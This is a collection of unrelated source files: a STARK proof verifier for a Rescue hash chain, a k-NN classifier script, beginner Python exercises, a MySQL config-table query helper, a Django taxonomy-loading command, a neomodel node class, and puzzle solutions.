for power in powers_list:
G2_to_the_power = f.exp(G2, power)
tmp_powers = [1]
for i in range(1, precision):
tmp_powers.append(tmp_powers[-1]*G2_to_the_power % modulus)
powers_eval.append(tmp_powers)
l_evaluations = [0 for i in range(precision)]
#We add all the constraints, deg adjusted
for c_ind, (_, constraint) in enumerate(constraints):
#l += (k[2*c_ind] + k[2*c_ind + 1]*g**constraint_power) * constraint
l_evaluations = [f.add(l_evaluations[i], f.mul(f.add(ks[c_ind*2], f.mul(ks[c_ind*2 + 1], powers_eval[c_ind][i])), constraint[i])) for i in range(precision)]
num_constraints = NUM_CONSTRAINTS
if file_hash is not None:
num_constraints += 4
assert num_constraints == len(constraints)
#We add all the p_mod values, deg adjusted
for p_ind, p_mod_i in enumerate(p_mod_eval):
l_evaluations = [f.add(l_evaluations[i], f.mul(f.add(ks[2*num_constraints + p_ind*2], f.mul(ks[2*num_constraints + p_ind*2 + 1], powers_eval[num_constraints + p_ind][i])), p_mod_i[i])) for i in range(precision)]
#We add p_evaluations, deg adjusted
l_evaluations = [f.add(l_evaluations[i], f.mul(f.add(ks[-2], f.mul(ks[-1], powers_eval[-1][i])), p_evaluations_extension[i])) for i in range(precision)]
l_mtree = merkelize(l_evaluations)
print("Computed random linear combination")
# Do some spot checks of the Merkle tree at pseudo-random coordinates, excluding
# multiples of `extension_factor`
samples = spot_check_security_factor
positions = get_pseudorandom_indices(l_mtree[1], precision, samples,
exclude_multiples_of=extension_factor)
augmented_positions = sum([[(x - ((x // extension_factor) % TRACE_SIZE)* extension_factor + i*extension_factor) % precision for i in range(2*TRACE_SIZE)] for x in positions], [])
print('Computed %d spot checks' % samples)
# Return the Merkle roots of P and D, the spot check Merkle proofs,
# and low-degree proofs of P and D
low_degree_pf = prove_low_degree(l_evaluations, G2, total_power, modulus, exclude_multiples_of=extension_factor)
o = [p_mtree[1],
c_mtree[1],
l_mtree[1],
mk_multi_branch(p_mtree, augmented_positions),
mk_multi_branch(c_mtree, augmented_positions),
mk_multi_branch(l_mtree, augmented_positions),
low_degree_pf]
print("STARK computed in %.4f sec" % (time.time() - start_time))
assert verify_low_degree_proof(l_mtree[1], G2, low_degree_pf, total_power, modulus, exclude_multiples_of=extension_factor), "Couldn't verify low_degree pf"
return o
# Verifies a STARK
def rescue_verify(output, proof, file_hash = None, chain_length = 12, comp_length = 4096):
    """Verify a STARK proving knowledge of a Rescue hash-chain preimage of `output`.

    output -- claimed hash-chain output committed to by the prover.
    proof -- 7-tuple: Merkle roots of the trace (p), constraint (c) and
        linear-combination (l) evaluations, the three multi-branch openings
        at the spot-check positions, and the FRI low-degree proof.
    file_hash -- optional extra committed value; its presence adds 4 constraints.
    chain_length -- number of hashes in the chain.
    comp_length -- trace-domain size; must be a power of two.

    Returns True when every check passes, False otherwise.
    """
    p_root, c_root, l_root, p_branches, c_branches, linear_comb_branches, fri_proof = proof
    start_time = time.time()
    if not is_a_power_of_2(comp_length):
        return False
    # Evaluation domain is the trace domain blown up by extension_factor.
    precision = comp_length * extension_factor
    # Get (steps)th root of unity
    G2 = f.exp(7, (modulus-1)//precision)
    # Domain step factors: skips2 advances one batch, skips3 one trace row.
    skips2 = comp_length // (BatchHeight * TRACE_SIZE)
    skips3 = comp_length // TRACE_SIZE
    # Degree bound shared with the prover (6 * comp_length).
    total_power = comp_length * 6
    if not verify_low_degree_proof(l_root, G2, fri_proof, total_power, modulus, exclude_multiples_of=extension_factor):
        return False
    print("Verified the random linear combination is low degree")
    # Public polynomial evaluations the constraints are checked against.
    all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, file_hash_eval = create_rescue_polynoms(precision, output, file_hash)
    num_constraints = NUM_CONSTRAINTS
    if file_hash is not None:
        num_constraints += 4
    powers = get_power_list(total_power, comp_length, file_hash is not None)
    # Performs the spot checks
    # Re-derive the prover's random linear-combination coefficients from p_root.
    ks = []
    for i in range(2*(num_constraints + TRACE_SIZE) + 2):
        ks.append(int.from_bytes(blake(p_root + i.to_bytes(2, 'big')), 'big') % modulus)
    samples = spot_check_security_factor
    positions = get_pseudorandom_indices(l_root, precision, samples,
                                         exclude_multiples_of=extension_factor)
    # For every sampled position, also open all 2*TRACE_SIZE offsets of the
    # current and next trace rows (the constraints reference both rows).
    augmented_positions = sum([[(x - ((x // extension_factor) % TRACE_SIZE)* extension_factor + i*extension_factor) % precision for i in range(2*TRACE_SIZE)] for x in positions], [])
    p_branch_leaves = verify_multi_branch(p_root, augmented_positions, p_branches)
    c_branch_leaves = verify_multi_branch(c_root, augmented_positions, c_branches)
    linear_comb_branch_leaves = verify_multi_branch(l_root, augmented_positions, linear_comb_branches)
    print("Verified Merkle branches")
    for i, pos in enumerate(positions):
        # NOTE: rebinds the name p_branches; the raw proof component is no
        # longer needed at this point.
        p_branches = [p_branch_leaves[i*(2*TRACE_SIZE) + j] for j in range(2*TRACE_SIZE)]
        # Each leaf packs the trace value (first 8 bytes) followed by
        # TRACE_SIZE p_mod values of 8 bytes each.
        p_vals = []
        p_mod_vals = [[] for j in range(TRACE_SIZE)]
        for j in range(2*TRACE_SIZE):
            p_vals.append(int.from_bytes(p_branches[j][:8], 'big'))
            for k in range(TRACE_SIZE):
                p_mod_vals[k].append(int.from_bytes(p_branches[j][8 + 8*k : 16 + 8*k], 'big'))
        for pos_ind in range(TRACE_SIZE):
            l_res = 0
            # Normalize pos to the start of its trace row, then step to pos_ind.
            pos = pos - ((pos // extension_factor) % TRACE_SIZE)*extension_factor + pos_ind * extension_factor
            x = f.exp(G2, pos)
            c_branch = c_branch_leaves[i*(2*TRACE_SIZE) + pos_ind]
            #Calculate the values of all the polynomials
            l_of_x = int.from_bytes(linear_comb_branch_leaves[i*(2*TRACE_SIZE) + pos_ind], 'big')
            # Sanity check: pos must now sit at in-row offset pos_ind.
            if not pos_ind == (pos // extension_factor) % TRACE_SIZE:
                return False
            # Unpack the constraint values and fold each into the linear
            # combination, degree-adjusted by x**powers[j].
            c_vals = []
            for j in range(0, len(c_branch)// 8):
                c_vals.append(int.from_bytes(c_branch[8*j : 8 + 8*j], 'big'))
                l_res += c_vals[-1] * (ks[j*2 + 0]+ ks[j*2 + 1] * f.exp(x, powers[j]))
            # state_after: forward half-round (cube S-box, MDS, even consts).
            state_after_eval = all_even_eval[pos]
            for j in range(TRACE_SIZE):
                state_after_eval = f.add(state_after_eval, f.mul(mds_eval[j][pos], f.exp(p_mod_vals[j][pos_ind], 3)))
            # state_before: inverse half-round applied to the next row's values.
            state_before_eval = 0
            for j in range(TRACE_SIZE):
                subbed = f.sub(p_mod_vals[j][pos_ind + TRACE_SIZE], odd_consts_mod_eval[j][pos])
                state_before_eval = f.add(state_before_eval, f.mul(inv_mds_eval[j][pos], subbed))
            state_before_eval = f.exp(state_before_eval, 3)
            #Validate the constraints:
            # Groups below mirror the prover's constraint order; each opened
            # c value must equal transition / vanishing-polynomial at x.
            const_ind = 0
            const_type_ind = 0
            # Group 0: filler columns past the state (state_ind in
            # [STATE_SIZE, TRACE_SIZE)) -- presumably zero-padding of the
            # trace; the matching prover loop is outside this chunk, confirm.
            for state_ind in range(STATE_SIZE, TRACE_SIZE):
                filler_state = f.sub(f.exp(G2, skips3 * (pos - state_ind*extension_factor) % precision), 1)
                if not c_vals[const_ind] == f.div(p_vals[pos_ind], filler_state):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 1: trace bytes 8:STATE_SIZE vanish at batch starts.
            for state_ind in range(8, STATE_SIZE):
                batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                if not c_vals[const_ind] == f.div(p_vals[pos_ind], batch_ind0):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 2: at the start of each batch the first state is one
            # half-round before the next one.
            for state_ind in range(0, STATE_SIZE):
                batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                if not c_vals[const_ind] == f.div(f.sub(f.add(p_vals[pos_ind], all_even_eval[pos]), state_before_eval), batch_ind0):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 3: for bytes 0:4, state_before(next half-round) equals
            # state_after(half-round) except at batch rows 0, 30, 31.
            for state_ind in range(0, 4):
                batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                batch_ind30 = f.sub(f.exp(G2, skips2*(pos - 30 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                batch_ind31 = f.sub(f.exp(G2, skips2*(pos - 31 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                all_batches = f.mul(f.mul(batch_ind0, batch_ind30),batch_ind31)
                filler_state = f.sub(f.exp(G2, skips3 * (pos - state_ind*extension_factor) % precision), 1)
                if not c_vals[const_ind] == f.div(f.mul(f.sub(state_after_eval, state_before_eval), all_batches), filler_state):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 4: same as group 3 for bytes 4:STATE_SIZE, additionally
            # excluding rows 10 and 20 (new hash starts within the batch).
            for state_ind in range(4, STATE_SIZE):
                batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                batch_ind10 = f.sub(f.exp(G2, skips2*(pos - 10 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                batch_ind20 = f.sub(f.exp(G2, skips2*(pos - 20 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                batch_ind30 = f.sub(f.exp(G2, skips2*(pos - 30 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                batch_ind31 = f.sub(f.exp(G2, skips2*(pos - 31 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                all_batches = f.mul(f.mul(f.mul(f.mul(batch_ind0, batch_ind10), batch_ind20), batch_ind30),batch_ind31)
                filler_state = f.sub(f.exp(G2, skips3 * (pos - state_ind*extension_factor) % precision), 1)
                if not c_vals[const_ind] == f.div(f.mul(f.sub(state_after_eval, state_before_eval), all_batches), filler_state):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 5: at rows 10 and 20 (new hash inside the batch), bytes
            # STATE_SIZE-4:STATE_SIZE are the even consts (initial state is
            # only 8 bytes wide).
            for state_ind in range(STATE_SIZE - 4, STATE_SIZE):
                batch_ind10 = f.sub(f.exp(G2, skips2*(pos - 10 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                batch_ind20 = f.sub(f.exp(G2, skips2*(pos - 20 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                all_batches = f.mul(batch_ind10, batch_ind20)
                if not c_vals[const_ind] == f.div(f.sub(state_before_eval, all_even_eval[pos]), all_batches):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 6: the start of the last state is one half-round after
            # the state before it (row 30).
            for state_ind in range(0, STATE_SIZE):
                batch_ind30 = f.sub(f.exp(G2, skips2*(pos - 30 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind + TRACE_SIZE], state_after_eval), batch_ind30):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 7: the first row after a batch equals the last row before
            # it (how the trace is laid out), except at the very end.
            for state_ind in range(0, 4):
                batch_ind31 = f.sub(f.exp(G2, skips2*(pos - 31 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
                last_step_eval = x - f.exp(G2, (comp_length - TRACE_SIZE + state_ind) *extension_factor)
                if not c_vals[const_ind] == f.div(f.mul(f.sub(p_vals[pos_ind + TRACE_SIZE], p_vals[pos_ind]), last_step_eval), batch_ind31):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 8: the claimed output actually appears in the trace at
            # the right spot (preimage check).
            for state_ind in range(0, len(output)):
                output_row_eval = f.sub(x, f.exp(G2, (ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE - TRACE_SIZE + state_ind)*extension_factor))
                if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind], output_eval[pos]), output_row_eval):
                    print(f"Failed in Constraints {const_type_ind}")
                    return False
                const_ind += 1
            const_type_ind += 1
            # Group 9: the p_mod polynomials are consistent with the trace.
            for state_ind in range(0, STATE_SIZE):
                for poly_ind in range(0, STATE_SIZE):
                    filler_state = f.sub(f.exp(G2, skips3 * (pos)), 1)
                    if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind + poly_ind], p_mod_vals[poly_ind][pos_ind + state_ind]), filler_state):
                        print(f"Failed in Constraints {const_type_ind}")
                        return False
                    const_ind += 1
            # Group 10 (only with file_hash): file_hash appears in the trace
            # at its designated rows.
            if file_hash is not None:
                const_type_ind += 1
                for state_ind in range(4, 8):
                    file_hash_row_eval = f.sub(x, f.exp(G2, (ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE + BatchHeight*TRACE_SIZE*RAND_BEFORE + state_ind)*extension_factor))
                    if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind], file_hash_eval[pos]), file_hash_row_eval):
                        print(f"Failed in Constraints {const_type_ind}")
                        return False
                    const_ind += 1
            #We add all the p_mod values, deg adjusted
            for p_ind, p_mod_i in enumerate(p_mod_vals):
                l_res = f.add(l_res, f.mul(f.add(ks[2*num_constraints + p_ind*2], f.mul(ks[2*num_constraints + p_ind*2 + 1], f.exp(x, powers[num_constraints + p_ind]))), p_mod_i[pos_ind]))
            #We add p_evaluations, deg adjusted
            l_res = f.add(l_res, f.mul(f.add(ks[-2], f.mul(ks[-1], f.exp(x, powers[num_constraints + TRACE_SIZE]))), p_vals[pos_ind]))
            # Check correctness of the linear combination
            if not (l_of_x == l_res):
                print("Linear combination is not correct")
                return False
    print('Verified %d consistency checks' % (TRACE_SIZE * spot_check_security_factor))
    print('Verified STARK in %.4f sec' % (time.time() - start_time))
    return True
|
21,976 | e9ba3e71fd45a0698b49e275066c761ed67d5fb9 | '''
Created on 2016年7月9日
@author: Shaow
'''
from numpy import *
import operator
from numpy.linalg.linalg import solve
from math import *
# from progressBar import *
import time
import sys
import measure
import samplingArchive
import os
from matplotlibPlot import *
from readFile import *
from knn import *
from measure import *
from poi import *
if __name__ == '__main__':
    # Resolve the data directory relative to this script's location.
    path = os.path.abspath(os.path.dirname(sys.argv[0]))
    print('正在初始化参数...')
    # 2015-11 (9:00-24:00) data input: samples to classify.
    testmat , testclassLabelVector = txt2data(path + '\\..\\data\\buffer.txt')
    #testmat = autoNorm(testmat)  # NOTE: with normalization, accuracy dropped to ~22%
    # Reference (training) matrix, its labels and the POI check counts.
    returnmat , classLabelVector ,numofcheck = txt2dataNum(path + '\\..\\data\\poi-test.txt')
    #returnmat , classLabelVector = txt2data(path + '\\..\\data\\8buffer.txt')
    #returnmat = autoNorm(returnmat)
    #save2txt('D:\\FILE\\PythonWorkspace\\machineLearning\\data\\', testmat, testclassLabelVector)
    # Category names used for reporting and plotting.
    labels = txt2cata(path + '\\..\\data\\category.txt')
    time.sleep(1)
    print('矩阵初始化完成!')
    # Predicted labels, filled in one sample at a time below.
    pTSL = []
    # bar = ProgressBar(total = 100)
    # print('----------三秒后展示原坐标点图----------')
    # barProcess(1,3)
    #plotData(returnmat,classLabelVector , labels)
    # print('原坐标图展示完成!')
    num = len(testmat)
    # print('----------K-NN计算进展情况----------')
    k = 0; # progress percentage counter, printed roughly every 1% of samples
    for i in range(len(testmat)):
        # Emit a crude textual progress indicator once per percent.
        if (i % int(len(testmat)/100) == 0):
            print('done ')
            print(k)
            print('%')
            k = k+1
        # if(i%(int(len(testmat)/100))==0):
        # bar.log('We have arrived at: ' + str(i + 1))
        # bar.move()
        # Classify sample i by the POI-aware k-NN (k = 5).
        pTSL.append(classifyByPoi(testmat[i] ,returnmat , classLabelVector ,numofcheck, 5))
        #pTSL.append(classify(testmat[i] ,returnmat , classLabelVector , 11))
    # Overall accuracy and per-sample correctness flags.
    cR,pStatus = currentRate(pTSL , testclassLabelVector)
    print('\n')
    print('本次预测准确度为:',cR)
    # Per-label counts for the true and predicted label vectors.
    cT = countLabels(testclassLabelVector, labels)
    pCT = countLabels(pTSL, labels)
    f1score = []
    fm = []
    for j in range(len(labels)):
        # Precision/recall/etc. per category, then F-measure and F1.
        p,r,s,a = countTF(testclassLabelVector,pTSL,labels[j] , pCT[j],cT[j])
        fm.append(fMeasure(r,a))
        f1score.append(f1Score(p,r))
    # print('----------三秒后展示预测坐标点图----------')
    # barProcess(1,3)
    plotData(testmat , pTSL , labels)
    print('预测图展示完成!')
    # print('----------三秒后展示预测情况图----------')
    # barProcess(1,3)
    plotData_2(testmat , pStatus)
    print('情况图展示完成!')
|
21,977 | ea8ecd2213403ccafebd287a0cc1ccbf4b470cb2 | # Program: Algoritmo326_Enq64.py
# Author: Ramon R. Valeriano
# Description:
# Developed: 14/04/2020 - 20:11
# Updated:
# Survey tally: reads (age, sex, experience) triples until a non-positive age,
# then reports female count, average age of experienced males, etc.
cont_f = 0      # number of female respondents
cont_m = 0      # number of experienced male respondents
higher_m = 0    # experienced males aged 45 or more
supergirl = 0   # females aged <= 35 with experience
sum_age = 0     # summed ages of experienced males
while True:
    age = int(input("Enter with your age: "))
    # Non-positive age terminates the input loop.
    if age <= 0 :
        break
    sex = input("Enter with your sex: ")
    sex = sex.upper()
    # Seed `smaller` with the first female's age.
    # NOTE(review): if no female is ever entered, `smaller` (and the final
    # print below) raises NameError -- confirm intended input constraints.
    if sex == "FEMALE" and cont_f == 0:
        smaller = age
    # NOTE: "/n" in the prompt is likely a typo for "\n".
    experience = input("Enter if have experience/nY - Yes or N - Not: ")
    experience = experience.upper()
    if sex == "FEMALE":
        cont_f+=1
        if age <= 35 and experience == "Y":
            supergirl+=1
        # Track the youngest female seen so far.
        if age < smaller:
            smaller = age
    elif sex == "MALE":
        # Only experienced males contribute to the male statistics.
        if experience == "Y":
            cont_m+=1
            sum_age+=age
            if age >= 45:
                higher_m+=1
    else:
        print("Invalid Option!")
# NOTE(review): raises ZeroDivisionError when no experienced male was entered.
media_age_m = sum_age/cont_m
# NOTE(review): (higher_m*cont_m)/100 looks like it was meant to be a
# percentage, i.e. higher_m/cont_m*100 -- confirm against the exercise spec.
conversion_m = (higher_m*cont_m)/100
print(cont_f)
print(media_age_m)
print(conversion_m)
print(smaller)
|
21,978 | 449314fdea43264145f935d483a24ffdf8b261d7 | # -*- coding: utf-8 -*-
# @Time : 2020/7/24 19:16
# @Author : wanglanqing
from business_modle.querytool import db
class VoyagerConfigs(object):
    """Read-only helpers that list config tables of the voyager / yijifen
    MySQL schemas (via information_schema) and dump a selected table's
    rows and column metadata through the shared `db` query tool.

    NOTE: Python 2 code (print statements)."""
    def __init__(self, db_env='testvoyager'):
        # Name of the DB environment/connection passed to db.selectsqlnew.
        self.db_env = db_env
    def get_act_game_cfgs(self):
        # List the nurturing-activity config tables (act_game* with
        # "cfg"/"config" in the name) of the voyager schema.
        # sql1 = """use information_schema;"""
        sql2 = """SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
        information_schema.`TABLES` WHERE
        `TABLE_SCHEMA` = 'voyager'
        AND (`TABLE_NAME` LIKE '%cfg%'
        or `TABLE_NAME` LIKE '%config%')
        AND `TABLE_NAME` LIKE 'act_game%';"""
        print self.db_env
        # db.selectsqlnew(self.db_env, sql1)
        re=db.selectsqlnew(self.db_env, sql2)
        if re:
            # NOTE(review): runs the same query a second time instead of
            # returning the `re` result already in hand.
            return db.selectsqlnew(self.db_env, sql2)
        else:
            return "没有查询到结果"
    def get_other_cfgs(self):
        # List the remaining (non act_game) config tables of voyager.
        # sql1 = """use information_schema;"""
        sql2 = """SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
        information_schema.`TABLES` WHERE
        `TABLE_SCHEMA` = 'voyager'
        AND (`TABLE_NAME` LIKE '%cfg%' or `TABLE_NAME` LIKE '%config%')
        AND `TABLE_NAME` not LIKE '%act_game%';"""
        # db.selectsqlnew(self.db_env, sql1)
        re=db.selectsqlnew(self.db_env, sql2)
        if re:
            # NOTE(review): duplicate query execution, see get_act_game_cfgs.
            return db.selectsqlnew(self.db_env, sql2)
        else:
            return "没有查询到结果"
    def get_yijifen_cfgs(self):
        # List config tables of the yijifen schema, excluding pigs_* but
        # always including yjf_app_media.
        # sql1 = """use information_schema;"""
        sql2 = """SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
        information_schema.`TABLES` WHERE
        `TABLE_SCHEMA` = 'yijifen'
        AND (`TABLE_NAME` LIKE '%cfg%' or `TABLE_NAME` LIKE '%config%')
        AND `TABLE_NAME` not LIKE '%pigs_%'
        or `TABLE_NAME` = 'yjf_app_media';"""
        # db.selectsqlnew(self.db_env, sql1)
        re=db.selectsqlnew(self.db_env, sql2)
        if re:
            return db.selectsqlnew(self.db_env, sql2)
        else:
            return "没有查询到结果"
    def get_pig_act_game_cfgs(self):
        # List the pig* activity tables of the yijifen schema.
        # sql1 = """use information_schema;"""
        sql2 = """ SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
        information_schema.`TABLES` WHERE
        `TABLE_SCHEMA` = 'yijifen'
        AND `TABLE_NAME` LIKE 'pig%';"""
        print self.db_env
        # db.selectsqlnew(self.db_env, sql1)
        re=db.selectsqlnew(self.db_env, sql2)
        if re:
            return db.selectsqlnew(self.db_env, sql2)
        else:
            return "没有查询到结果"
    def get_selected_table_cfg(self,selected_table, db_name):
        # Dump all rows (newest first) plus the column metadata of one table.
        # NOTE(review): table/db names are interpolated via .format -- only
        # safe as long as the inputs come from the trusted table lists above.
        sql = "select * from {}.{} order by create_time desc;".format(db_name, selected_table)
        sql2= """select COLUMN_NAME '字段',COLUMN_TYPE '类型',COLUMN_COMMENT '备注' from information_schema.columns where table_schema = '{}'
        and table_name = '{}' ;""".format(db_name, selected_table)
        print sql,sql2
        re1=db.selectsqlnew(self.db_env, sql)
        re2=db.selectsqlnew(self.db_env,sql2)
        # A str result signals an error message from the query tool.
        if isinstance(re1,str):
            return re1
        elif isinstance(re1,tuple) and isinstance(re2,tuple):
            # NOTE(review): re-executes both queries instead of returning
            # (re1, re2) already in hand.
            return db.selectsqlnew(self.db_env, sql), db.selectsqlnew(self.db_env,sql2)
        else:
            return "没有查询到结果"
    def get_pig_selected_table_cfg(self,selected_table):
        # Same as get_selected_table_cfg but hard-wired to the yijifen
        # schema and ordered by id instead of create_time.
        sql = "select * from yijifen.{} order by id desc;".format(selected_table)
        sql2= """select COLUMN_NAME '字段',COLUMN_TYPE '类型',COLUMN_COMMENT '备注' from information_schema.columns where table_schema = 'yijifen'
        and table_name = '{}' ;""".format(selected_table)
        print sql,sql2
        re1=db.selectsqlnew(self.db_env, sql)
        re2=db.selectsqlnew(self.db_env,sql2)
        if isinstance(re1,str):
            return re1
        elif isinstance(re1,tuple) and isinstance(re2,tuple):
            return db.selectsqlnew(self.db_env, sql), db.selectsqlnew(self.db_env,sql2)
        else:
            return "没有查询到结果"
if __name__ == '__main__':
    # Ad-hoc manual check against the dev environment.
    vc = VoyagerConfigs(db_env='devvoyager')
    # NOTE(review): get_selected_table_cfg also requires db_name -- this
    # call as written raises TypeError.
    print vc.get_selected_table_cfg('config_parameters_copy1')
21,979 | 0a9e94be7767802acf66278f1ace78d31e412d88 | from django.core.management.base import NoArgsCommand
from optparse import make_option
import os
from django.conf import settings
class Command(NoArgsCommand):
    """Django management command (Python 2): bulk-load every taxonomy dump
    file from the package's dumps/ directory into the database by shelling
    out to the matching DB client (sqlite3 / mysql / psql)."""
    help = "Load all taxonomy data into database"
    requires_system_checks = True
    def handle_noargs(self, **options):
        localDir = os.path.dirname(__file__)
        absDir = os.path.join(os.getcwd(), localDir)
        verbose = options.get("verbose", True)
        if verbose:
            print "loading taxonomy, please wait, it can take a while..."
        # dumps/ lives two levels above this management command module.
        path_dumps = os.path.join( absDir,'..','..', 'dumps' )
        db_name = settings.DATABASES["default"]["NAME"]
        db_engine = settings.DATABASES["default"]["ENGINE"]
        map_dumps = {}
        # print os.listdir( path_dumps )
        for dump in os.listdir( path_dumps ):
            ###########
            if dump == '.svn': continue # XXX
            # Dump file name (without extension) doubles as the table suffix.
            name = os.path.splitext( dump )[0]
            map_dumps[name] = os.path.join( path_dumps, dump )
            # Build the engine-specific bulk-import shell command.
            # NOTE(review): for any other engine, `cmd` is stale (or unbound
            # on the first iteration) when os.system runs below.
            if db_engine.endswith('sqlite3'):
                cmd = "sqlite3 -separator '|' %s '.import %s server_%s'" % (
                    db_name, map_dumps[name], name)
            elif db_engine.endswith('mysql'):
                # FOREIGN_KEY_CHECKS=0 lets dumps load in arbitrary order.
                cmd = """mysql --local-infile -h %s -u %s -p%s %s -e "SET FOREIGN_KEY_CHECKS=0; LOAD DATA LOCAL INFILE '%s' INTO TABLE djangophylocore_%s FIELDS TERMINATED BY '|';" """ % (
                    settings.DATABASES["default"]["HOST"], settings.DATABASES["default"]["USER"], settings.DATABASES["default"]["PASSWORD"], db_name, map_dumps[name], name )
            elif db_engine.endswith('psycopg2'):
                # Triggers disabled for the COPY to skip FK enforcement.
                cmd = """psql -h %s -U %s -d %s -c "ALTER TABLE djangophylocore_%s DISABLE TRIGGER ALL; COPY djangophylocore_%s FROM '%s' WITH DELIMITER AS '|'; ALTER TABLE djangophylocore_%s ENABLE TRIGGER ALL; " """ % (
                    settings.DATABASES["default"]["HOST"],settings.DATABASES["default"]["USER"], db_name, name, name, map_dumps[name], name)
            if verbose:
                print cmd
            os.system( cmd )
        # if not os.path.exists(
        # os.path.join( path_dumps, 'parentsrelation.dmp' ) ):
        # if verbose:
        # print "no parent relations found, generating..."
        # os.system( 'python manage.py generateparents' )
|
21,980 | e46245e637ca87a4b32f41b13c5e13654cf0d0c7 |
from .nodeutils import NodeUtils
from neomodel import (
StringProperty,
StructuredNode,
RelationshipTo,
RelationshipFrom,
Relationship
)
class Protein(StructuredNode, NodeUtils):
    """Neo4j graph node for a protein, keyed by its UniProt identifier."""
    # UniProt accession of this protein.
    uniprotid = StringProperty()
    # drugs = RelationshipFrom('.drug.Drug', 'TARGETS')
    # Outgoing HAS_ANNOTATION edges to Gene Ontology terms.
    go = RelationshipTo('.go.GO', 'HAS_ANNOTATION')
    @property
    def serialize(self):
        """Plain-dict view of this node's own properties."""
        return {
            'node_properties': {
                'uniprotid': self.uniprotid,
                'id': self.id,
            },
        }
    @property
    def serialize_connections(self):
        # Define all the relationships that a node has with the other
        # nodes in the database.
        # serialize_relationships is presumably provided by the NodeUtils
        # mixin (not shown in this file) -- confirm.
        return [
            {
                'nodes_type':'GO',
                'nodes_related': self.serialize_relationships(self.go.all()),
            },
        ]
|
21,981 | 9cbdad9ef634afe4a26b098b1bcac0d9232bd685 | import pathlib
from collections import Counter
def get_input():
    """Read input.txt next to this script and return its lines, stripped."""
    root_path = pathlib.Path(__file__).parent.absolute()
    with open(f"{root_path}/input.txt", "r") as input_file:
        input_raw = input_file.readlines()
    return [line.strip() for line in input_raw]
def get_most_common_bit(input_data, index):
    """Return the most frequent character found at position *index*
    across all rows of *input_data*."""
    column = "".join(row[index] for row in input_data)
    return Counter(column).most_common(1)[0][0]
def get_least_common_bit(input_data, index):
    """Return the least frequent character found at position *index*
    across all rows of *input_data*."""
    column = "".join(row[index] for row in input_data)
    return Counter(column).most_common()[-1][0]
def get_answer_part_1(input_data):
    """Power consumption: gamma rate (per-column most common bit) times
    epsilon rate (per-column least common bit)."""
    width = len(input_data[0])
    gamma_bits = "".join(get_most_common_bit(input_data, col) for col in range(width))
    epsilon_bits = "".join(get_least_common_bit(input_data, col) for col in range(width))
    return int(gamma_bits, 2) * int(epsilon_bits, 2)
def get_answer_part_2(input_data):
pass
def main():
    """Read the puzzle input and print the answer for each part."""
    input_data = get_input()
    answer1 = get_answer_part_1(input_data)
    answer2 = get_answer_part_2(input_data)
    print(f"Part 1 answer: {answer1}")
    print(f"Part 2 answer: {answer2}")
if __name__ == "__main__":
    main()
|
21,982 | 494c63ef2bf76499ef209827ab4912f7b4e486b3 | import string
def universe(arr,damage):
    """Return the minimum number of adjacent swaps needed so the program
    `arr` (a string of 'S' shoot / 'C' charge instructions) deals at most
    `damage`, or -1 when that is impossible.

    Greedy: repeatedly swap the right-most 'CS' pair (located as 'SC' in
    the reversed string), which always removes the most damage per swap.
    """
    swap = 0
    dealt = calDamage(arr)
    while dealt > damage:
        mirrored = arr[::-1]
        hit = mirrored.find('SC')
        if hit == -1:
            # No 'C' left before any 'S': damage cannot be reduced further.
            swap = -1
            break
        mirrored = mirrored[:hit] + 'CS' + mirrored[hit + 2:]
        swap += 1
        arr = mirrored[::-1]
        dealt = calDamage(arr)
    print(dealt, swap, arr)
    return swap
def calDamage(arr):
    """Total damage of program `arr`: every 'S' fires the current beam,
    every other instruction ('C') doubles the beam (which starts at 1)."""
    strength, total = 1, 0
    for instruction in arr:
        if instruction == 'S':
            total += strength
        else:
            strength *= 2
    return total
if __name__ == '__main__':
    # Number of test cases, then one "damage-limit program" pair per case.
    t = int(input())
    for k in range(t):
        d,ar = input().split()
        d = int(d)
        res = universe(ar,d)
        # NOTE(review): this local rebinding shadows the `string` module
